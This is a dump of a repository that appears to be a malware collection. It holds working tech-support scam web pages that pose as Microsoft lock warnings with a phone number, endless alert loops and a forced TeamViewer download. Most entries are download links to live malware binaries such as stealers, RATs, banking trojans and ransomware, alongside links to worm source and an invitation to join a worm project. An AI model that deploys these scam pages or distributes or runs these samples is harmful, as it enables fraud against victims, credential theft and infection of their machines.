/ジョークサイト/Fake MacOS Infection/firiedge/defender.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョークサイト/Fake MacOS Infection/firiedge/defender.png -------------------------------------------------------------------------------- /ジョークサイト/Fake MacOS Infection/firiedge/favico.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョークサイト/Fake MacOS Infection/firiedge/favico.jpg -------------------------------------------------------------------------------- /ジョークサイト/Fake MacOS Infection/firiedge/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | Microsoft Windows Notification 9 | 10 | 11 | 12 | 13 | 14 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | ** YOUR COMPUTER WAS LOCKED ** 41 | Error # DT00X02. 42 | 43 | Call Microsoft Technical Suppport: 44 | +1-844-589-2165(Toll-Free): 45 | Do Not Ignore This Important Warning 46 | If you close this page without resolving issue, access to your computer will be disabled to prevent further damage to our network. 47 | 48 | Your computer has alerted us that it was infected with virus and spyware. The following data is at risk: 49 | 50 | 1. Facebook Login 51 | 2. Credit Card Information 52 | 3. Email Credentials 53 | 4. Browsing History and Data 54 | 55 | You must contact us immediately so our engineers can guide you through the recovery process by phone. Please call us within the next 5 minutes to prevent complete loss of your computer. 56 | 57 | 58 | Contact Microsoft Engineer: +1-844-589-2165 (Toll-Free) 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | x 68 | Security Warning: 69 | 70 | ** YOUR COMPUTER WAS LOCKED ** 71 | Error # DT00X2. 72 | 73 | Call Microsoft Technical Support at: +1-844-589-2165 74 | Do Not Ignore This Important Warning 75 | If you close this page without resolving issue, access to your computer will be disabled to prevent further damage to our network. 76 | Your computer has alerted us that it was infected with virus and spyware. The following data is at risk: 77 | 78 | 1. Facebook Login 79 | 2. Credit Card Information 80 | 3. Email Credentials 81 | 4. Browsing History and Data 82 | 83 | You must contact us immediately so our engineers can guide you through the recovery process by phone. Please call us within the next 5 minutes to prevent complete loss of your computer. 84 | Contact Microsoft Engineer: +1-844-589-2165 (Toll-Free) 85 | 86 | 87 | Prevent this page from creating additional dialogues. sereno 88 | OK 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | -------------------------------------------------------------------------------- /ジョークサイト/Fake MacOS Infection/firiedge/login.php: -------------------------------------------------------------------------------- 1 | Internet Security Damaged !!! Call Help Desk"; 23 | 24 | 25 | exit; 26 | } 27 | } else { 28 | 29 | header('Location: login.php'); 30 | header('Location: http://download.teamviewer.com/download/TeamViewer_Setup_en.exe'); 31 | 32 | exit; 33 | } 34 | ?> 35 | -------------------------------------------------------------------------------- /ジョークサイト/Fake MacOS Infection/ie.svg: -------------------------------------------------------------------------------- 1 | 2 | 4 | 7 | 8 | 10 | 12 | 15 | 16 | 17 | -------------------------------------------------------------------------------- /ジョークサイト/Fake MacOS Infection/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョークサイト/Fake MacOS Infection/logo.png -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Block/405.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョークサイト/Fake Microsoft Block/405.zip -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Block/files/alert.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョークサイト/Fake Microsoft Block/files/alert.jpg -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Block/files/alertmicrosoft.mp3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョークサイト/Fake Microsoft Block/files/alertmicrosoft.mp3 -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Block/files/background-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョークサイト/Fake Microsoft Block/files/background-2.png -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Block/files/microsoft.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョークサイト/Fake Microsoft Block/files/microsoft.png -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Block/files/style.css: -------------------------------------------------------------------------------- 1 | @import 'https://fonts.googleapis.com/css?family=Open+Sans:400,600,700'; 2 | html, 3 | body { 4 | margin: 0; 5 | padding: 0; 6 | font-family: 'Titillium Web', sans-serif 7 | } 8 | 9 | .container { 10 | width: 100%; 11 | overflow-x: hidden; 12 | position: relative; 13 | } 14 | 15 | p { 16 | margin: 0 17 | } 18 | 19 | #map { 20 | display: block; 21 | position: absolute; 22 | top: 20px; 23 | left: calc(50% - 400px); 24 | width: 800px; 25 | margin: 0 auto; 26 | z-index: 7000 27 | } 28 | 29 | #second_alert { 30 | width: 430px; 31 | margin: 0 auto; 32 | position: relative 33 | } 34 | 35 | #second_alert img { 36 | width: 100% 37 | } 38 | 39 | #phoneal { 40 | position: absolute; 41 | top: 250px; 42 | left: 45px; 43 | font-size: 14px; 44 | font-weight: 700; 45 | color: #000 46 | } 47 | 48 | #secpage { 49 | position: absolute; 50 | left: 7.5%; 51 | top: 12%; 52 | width: 85%; 53 | color: #3B5998; 54 | text-align: center; 55 | font-family: 'Open Sans', sans-serif; 56 | color: #000; 57 | } 58 | .lokacioni{ 59 | font-weight: 600; 60 | font-size: 32px; 61 | } 62 | .lokacioni2{ 63 | font-size: 26px; 64 | font-weight: 600 65 | } 66 | .lokacioni3{ 67 | font-size: 26px; 68 | font-weight: 700 69 | } 70 | #thirdpage{ 71 | position: absolute; 72 | left: 7.5%; 73 | top: 60%; 74 | width: 85%; 75 | color: #3B5998; 76 | text-align: center; 77 | font-family: 'Open Sans', sans-serif; 78 | color: #000; 79 | } 80 | 81 | #nmb { 82 | font-weight: 700 83 | } 84 | /*bubble*/ 85 | .bubble{ 86 | display: none; 87 | width: 200px; 88 | padding: 10px 15px; 89 | border-radius: 15px; 90 | position: absolute; 91 | bottom: 14px; 92 | right: 15px; 93 | background-color: #fff; 94 | border: 1px solid #878787; 95 | z-index: 99999; 96 | font-family: 'Roboto', sans-serif; 97 | font-size: 14px; 98 | line-height: 20px; 99 | font-weight: 500; 100 | color: #444; 101 | text-align: center; 102 | opacity: 0; 103 | } 104 | 105 | 106 | .bubble:after, .bubble:before { 107 | top: 100%; 108 | left: 45px; 109 | border: solid transparent; 110 | content: " "; 111 | height: 0; 112 | width: 0; 113 | position: absolute; 114 | pointer-events: none; 115 | } 116 | 117 | .bubble:after { 118 | border-color: rgba(255, 255, 255, 0); 119 | border-top-color: #ffffff; 120 | border-width: 12px; 121 | margin-left: -12px; 122 | } 123 | .bubble:before { 124 | border-color: rgba(135, 135, 135, 0); 125 | border-top-color: #878787; 126 | border-width: 13px; 127 | margin-left: -13px; 128 | } 129 | -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Block/files/warning.mp3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョークサイト/Fake Microsoft Block/files/warning.mp3 -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Block/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | Microsoft Official Support 9 | 10 | 11 | 12 | 13 | 14 | 17 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | Windows Has Detected a Malicious Virus On Your System 97 | 98 | Do Not Shutdown Or Restart Your Computer 99 | Contact Our Certified Windows Technicians For Immediate Assistance 100 | 101 | 102 | 103 | 104 | Contact Our Certified Windows Technicians For Immediate Assistance 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | Microsoft Error: Unknown System Failure! 121 | 122 | 123 | 124 | 125 | Call tech support... 126 | 127 | 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | 136 | 137 | 160 | 161 | 162 | 163 | 164 | 165 | 166 | -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Block/msie1.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | Microsoft Official Support 9 | 10 | 11 | 12 | 13 | 16 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | Windows Has Detected a Malicious Virus On Your System 96 | 97 | Do Not Shutdown Or Restart Your Computer 98 | Contact Our Certified Windows Technicians For Immediate Assistance 99 | 100 | 101 | 102 | 103 | Contact Our Certified Windows Technicians For Immediate Assistance 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | Microsoft Error: Unknown System Failure! 120 | 121 | 122 | 123 | 124 | Call tech support... 125 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | 136 | 159 | 160 | 161 | 162 | 163 | 164 | 165 | -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Block/msie2.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | Microsoft Official Support 9 | 10 | 11 | 12 | 13 | 16 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | Windows Has Detected a Malicious Virus On Your System 95 | 96 | Do Not Shutdown Or Restart Your Computer 97 | Contact Our Certified Windows Technicians For Immediate Assistance 98 | 99 | 100 | 101 | 102 | Contact Our Certified Windows Technicians For Immediate Assistance 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | Microsoft Error: Unknown System Failure! 119 | 120 | 121 | 122 | 123 | Call tech support... 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | 158 | 159 | 160 | 161 | 168 | 169 | 170 | 171 | 172 | 173 | -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Support/chrome-assests/a.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 404 Not Found 4 | 5 | Not Found 6 | The requested URL /Index/chrome/chrome-assests/a.htm was not found on this server. 7 | Additionally, a 404 Not Found 8 | error was encountered while trying to use an ErrorDocument to handle the request. 9 | 10 | -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Support/chrome-assests/alert.css: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Support/chrome-assests/gb.mp3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョークサイト/Fake Microsoft Support/chrome-assests/gb.mp3 -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Support/chrome-assests/ie10-viewport-bug-workaround.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 404 Not Found 4 | 5 | Not Found 6 | The requested URL /Index/chrome/chrome-assests/ie10-viewport-bug-workaround.css was not found on this server. 7 | Additionally, a 404 Not Found 8 | error was encountered while trying to use an ErrorDocument to handle the request. 9 | 10 | -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Support/chrome-assests/iframe.js: -------------------------------------------------------------------------------- 1 | window.addEventListener('resize', function(){ 2 | if(screen.width === window.innerWidth){ 3 | document.getElementById('auth').innerHTML = ""; 4 | } 5 | 6 | setInterval(function () { alert("Your computer is in blocked state.\nSYSTEM WARNING :\nDO NOT PRESS ANY KEY UNTIL YOU KNOW SAFE SIDE INSTRUCTIONS.\n For saftey instructions immediately call on the support number , a Microsoft Super Technician is waiting to guide you to safeguard your system.\nYou must not avoid this warning , as this is a very critical infection.\nMicrosoft Super Technicians are level 9 technicians which are expertise in resolving these kind of issues.\nTHIS CALL IS A TOLL FREE CALL. ") }, 0000); 7 | 8 | 9 | 10 | }); 11 | -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Support/chrome-assests/images.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョークサイト/Fake Microsoft Support/chrome-assests/images.zip -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Support/chrome-assests/img-1.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Support/chrome-assests/img-10.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Support/chrome-assests/img-11.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 7 | 8 | 9 | 10 | 11 | -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Support/chrome-assests/img-12.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Support/chrome-assests/img-2.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Support/chrome-assests/img-3.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Support/chrome-assests/img-4.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 10 | 11 | 12 | 13 | 14 | -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Support/chrome-assests/img-5.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Support/chrome-assests/img-6.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Support/chrome-assests/img-7.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Support/chrome-assests/img-8.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Support/chrome-assests/img-9.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Support/chrome-assests/microsoft.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョークサイト/Fake Microsoft Support/chrome-assests/microsoft.png -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Support/index.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョークサイト/Fake Microsoft Support/index.html -------------------------------------------------------------------------------- /ジョークサイト/Fake Microsoft Support/murphy_chrome.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョークサイト/Fake Microsoft Support/murphy_chrome.zip -------------------------------------------------------------------------------- /スティーラー/Azorult.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/スティーラー/Azorult.exe -------------------------------------------------------------------------------- /スティーラー/Lokibot.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/スティーラー/Lokibot.exe -------------------------------------------------------------------------------- /スパイウェア/AgentTesla.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/スパイウェア/AgentTesla.exe -------------------------------------------------------------------------------- /スパイウェア/Kakwa.doc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/スパイウェア/Kakwa.doc -------------------------------------------------------------------------------- /スパイウェア/The Worst Of All!!!!!!/BonziBUDDY!!!!!!.txt: -------------------------------------------------------------------------------- 1 | Download Link: https://www.bonzi.link/ 2 | 3 | Expand Dong!!!!!! 4 | -------------------------------------------------------------------------------- /スパイウェア/butterflyondesktop.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/スパイウェア/butterflyondesktop.exe -------------------------------------------------------------------------------- /ネットワーム/Blaster/Blaser.C.sourcecode.txt: -------------------------------------------------------------------------------- 1 | https://gist.github.com/yorickdewid/a9fb98da3c367b360e36 2 | -------------------------------------------------------------------------------- /ネットワーム/Blaster/Blaster.A.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ネットワーム/Blaster/Blaster.A.exe -------------------------------------------------------------------------------- /ネットワーム/Blaster/Blaster.E.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ネットワーム/Blaster/Blaster.E.exe -------------------------------------------------------------------------------- /ネットワーム/CodeRed.a.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ネットワーム/CodeRed.a.exe -------------------------------------------------------------------------------- /ネットワーム/EternalRocks.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ネットワーム/EternalRocks.exe -------------------------------------------------------------------------------- /ネットワーム/Kolabc/Kobalc.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ネットワーム/Kolabc/Kobalc.exe -------------------------------------------------------------------------------- /ネットワーム/Loveware.txt: -------------------------------------------------------------------------------- 1 | Hello! Please check out my project on github. 2 | It is called Loveware, an email and net-worm. 3 | 4 | You can participate in the project if you want, 5 | because this peace of malware is community driven. 6 | 7 | Official Repository: https://github.com/TheG0df2ther/Loveware/blob/master/Loveware/Loveware.bat 8 | 9 | Regards, 10 | 11 | TheG0df2ther 12 | -------------------------------------------------------------------------------- /ネットワーム/Opaserv.l.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ネットワーム/Opaserv.l.exe -------------------------------------------------------------------------------- /ネットワーム/Rahack/Rahack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ネットワーム/Rahack/Rahack.exe -------------------------------------------------------------------------------- /ネットワーム/Sasser/Sasser.A.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ネットワーム/Sasser/Sasser.A.exe -------------------------------------------------------------------------------- /ネットワーム/Sasser/Sasser.B.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ネットワーム/Sasser/Sasser.B.exe -------------------------------------------------------------------------------- /ネットワーム/Sasser/Sasser.c.sourcecode.txt: -------------------------------------------------------------------------------- 1 | https://github.com/yorickdewid/Sasser 2 | -------------------------------------------------------------------------------- /バンキングマルウェア/DanaBot.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/バンキングマルウェア/DanaBot.exe -------------------------------------------------------------------------------- /バンキングマルウェア/Dridex/Dridex.JhiSharp.dll.9d75ff0e9447ceb89c90cca24a1dbec1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/バンキングマルウェア/Dridex/Dridex.JhiSharp.dll.9d75ff0e9447ceb89c90cca24a1dbec1 -------------------------------------------------------------------------------- /バンキングマルウェア/Dridex/DridexDroppedVBS.925da3a10f7dde802c8d87047b14fda6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/バンキングマルウェア/Dridex/DridexDroppedVBS.925da3a10f7dde802c8d87047b14fda6 -------------------------------------------------------------------------------- /バンキングマルウェア/Dridex/DridexLoader.bin.exe.c26203af4b3e9c81a9e634178b603601: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/バンキングマルウェア/Dridex/DridexLoader.bin.exe.c26203af4b3e9c81a9e634178b603601 -------------------------------------------------------------------------------- /バンキングマルウェア/Dridex/Trojan.Dridex.A. dbf96ab40b728c12951d317642fbd9da: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/バンキングマルウェア/Dridex/Trojan.Dridex.A. dbf96ab40b728c12951d317642fbd9da -------------------------------------------------------------------------------- /バンキングマルウェア/Dridex/Trojan.Dridex.A.6164228ed2cc0eceba9ce1828d87d827: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/バンキングマルウェア/Dridex/Trojan.Dridex.A.6164228ed2cc0eceba9ce1828d87d827 -------------------------------------------------------------------------------- /バンキングマルウェア/Dridex/Trojan.Dridex.A.97a26d9e3598fea2e1715c6c77b645c2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/バンキングマルウェア/Dridex/Trojan.Dridex.A.97a26d9e3598fea2e1715c6c77b645c2 -------------------------------------------------------------------------------- /バンキングマルウェア/Emotet.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/バンキングマルウェア/Emotet.zip -------------------------------------------------------------------------------- /バンキングマルウェア/Zloader.xlsm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/バンキングマルウェア/Zloader.xlsm -------------------------------------------------------------------------------- /ブラウザーハイジャック/BabylonToolbar.txt: -------------------------------------------------------------------------------- 1 | Download Link: https://www.babylon-software.com/download 2 | -------------------------------------------------------------------------------- /ポニー/metrofax.doc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ポニー/metrofax.doc -------------------------------------------------------------------------------- /ラット/Adwind.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ラット/Adwind.exe -------------------------------------------------------------------------------- /ラット/Blackkomet.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ラット/Blackkomet.exe -------------------------------------------------------------------------------- /ラット/CobaltStrike.doc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ラット/CobaltStrike.doc -------------------------------------------------------------------------------- /ラット/CrimsonRAT.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ラット/CrimsonRAT.exe -------------------------------------------------------------------------------- /ラット/NJRat.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ラット/NJRat.exe -------------------------------------------------------------------------------- /ラット/NetWire.doc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ラット/NetWire.doc -------------------------------------------------------------------------------- /ラット/NetWire.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ラット/NetWire.exe -------------------------------------------------------------------------------- /ラット/Remcos.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ラット/Remcos.exe -------------------------------------------------------------------------------- /ラット/RevengeRAT.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ラット/RevengeRAT.exe -------------------------------------------------------------------------------- /ラット/VanToM-Rat.bat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ラット/VanToM-Rat.bat -------------------------------------------------------------------------------- /ランサムウェア/$uckyLocker.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/$uckyLocker.exe -------------------------------------------------------------------------------- /ランサムウェア/7ev3n.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/7ev3n.exe -------------------------------------------------------------------------------- /ランサムウェア/86e0eac8c5ce70c4b839ef18af5231b5f92e292b81e440193cdbdc7ed108049f.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/86e0eac8c5ce70c4b839ef18af5231b5f92e292b81e440193cdbdc7ed108049f.exe -------------------------------------------------------------------------------- /ランサムウェア/Automatic_converter_rff_to_mp4.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/Automatic_converter_rff_to_mp4.exe -------------------------------------------------------------------------------- /ランサムウェア/BadRabbit.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/BadRabbit.exe -------------------------------------------------------------------------------- /ランサムウェア/Birele.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/Birele.exe -------------------------------------------------------------------------------- /ランサムウェア/Cerber5.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/Cerber5.exe -------------------------------------------------------------------------------- /ランサムウェア/DeriaLock.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/DeriaLock.exe -------------------------------------------------------------------------------- /ランサムウェア/Dharma.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/Dharma.exe -------------------------------------------------------------------------------- /ランサムウェア/Fantom.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/Fantom.exe -------------------------------------------------------------------------------- /ランサムウェア/GandCrab.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/GandCrab.exe -------------------------------------------------------------------------------- /ランサムウェア/GoldenEye/GoldenEye.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/GoldenEye/GoldenEye.exe -------------------------------------------------------------------------------- /ランサムウェア/InfinityCrypt.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/InfinityCrypt.exe -------------------------------------------------------------------------------- /ランサムウェア/JigsawRansomware.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/JigsawRansomware.exe -------------------------------------------------------------------------------- /ランサムウェア/Krotten.exe: -------------------------------------------------------------------------------- 